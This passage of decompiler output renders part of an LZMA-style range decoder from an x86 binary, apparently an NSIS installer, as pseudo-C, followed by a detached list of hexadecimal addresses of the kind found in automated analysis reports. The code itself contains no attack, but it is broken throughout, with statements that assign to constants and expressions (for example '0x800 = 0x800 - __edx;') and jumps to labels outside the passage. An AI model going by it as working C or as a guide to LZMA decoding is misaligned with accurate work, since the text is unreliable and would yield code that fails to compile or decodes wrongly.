							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									__ebx = __edx + 1;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__ebx = __edx + 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                      0x00000000
                                                                      0x00406c26
                                                                      0x00406c26
                                                                      0x00406c2a
                                                                      0x00406ce1
                                                                      0x00406ce4
                                                                      0x00406cf0
                                                                      0x00406bd1
                                                                      0x00406bd1
                                                                      0x00406bd4
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f95
                                                                      0x00406fbc
                                                                      0x00406fbc
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00406f97
                                                                      0x00406f97
                                                                      0x00406f9b
                                                                      0x0040714a
                                                                      0x00000000
                                                                      0x0040714a
                                                                      0x00406fa7
                                                                      0x00406fae
                                                                      0x00406fb6
                                                                      0x00406fb9
                                                                      0x00000000
                                                                      0x00406fb9
                                                                      0x00406c30
                                                                      0x00406c34
                                                                      0x00407175
                                                                      0x00407175
                                                                      0x00407178
                                                                      0x0040717c
                                                                      0x0040717c
                                                                      0x00406c3a
                                                                      0x00406c40
                                                                      0x00406c43
                                                                      0x00406c47
                                                                      0x00406c4a
                                                                      0x00406c4e
                                                                      0x00407114
                                                                      0x00407160
                                                                      0x00407168
                                                                      0x0040716f
                                                                      0x00407171
                                                                      0x00000000
                                                                      0x00407171
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c5d
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c62
                                                                      0x00406c65
                                                                      0x00406c68
                                                                      0x00406c6b
                                                                      0x00406c6e
                                                                      0x00406c71
                                                                      0x00406c72
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c77
                                                                      0x00406c7a
                                                                      0x00406c7d
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c83
                                                                      0x00406c85
                                                                      0x00406c85
                                                                      0x00406c88
                                                                      0x00406c88
                                                                      0x00406c88
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x00406767
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00000000
                                                                      0x00406778
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406781
                                                                      0x00406784
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406791
                                                                      0x00406794
                                                                      0x00406796
                                                                      0x00406797
                                                                      0x0040679a
                                                                      0x0040679c
                                                                      0x0040679d
                                                                      0x0040679f
                                                                      0x004067a2
                                                                      0x004067a7
                                                                      0x004067ac
                                                                      0x004067b5
                                                                      0x004067c8
                                                                      0x004067cb
                                                                      0x004067d7
                                                                      0x004067ff
                                                                      0x00406801
                                                                      0x0040680f
                                                                      0x0040680f
                                                                      0x00406813
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x00406803
                                                                      0x00406806
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x004067dd
                                                                      0x004067e2
                                                                      0x004067e2
                                                                      0x004067eb
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x00406819
                                                                      0x00406819
                                                                      0x0040681d
                                                                      0x004070c9
                                                                      0x00000000
                                                                      0x004070c9
                                                                      0x00406826
                                                                      0x00406836
                                                                      0x00406839
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683c
                                                                      0x0040683f
                                                                      0x00406843
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406845
                                                                      0x0040684b
                                                                      0x00406875
                                                                      0x0040687b
                                                                      0x00406882
                                                                      0x00000000
                                                                      0x00406882
                                                                      0x00406851
                                                                      0x00406854
                                                                      0x00406859
                                                                      0x00406859
                                                                      0x00406864
                                                                      0x0040686c
                                                                      0x0040686f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068b4
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068ca
                                                                      0x004068d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406889
                                                                      0x00406889
                                                                      0x0040688d
                                                                      0x004070d8
                                                                      0x00000000
                                                                      0x004070d8
                                                                      0x00406899
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a7
                                                                      0x004068aa
                                                                      0x004068ad
                                                                      0x004068b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068da
                                                                      0x004068dc
                                                                      0x004068df
                                                                      0x00406950
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695d
                                                                      0x00406967
                                                                      0x00000000
                                                                      0x00406967
                                                                      0x004068e1
                                                                      0x004068e5
                                                                      0x004068e8
                                                                      0x004068ea
                                                                      0x004068ed
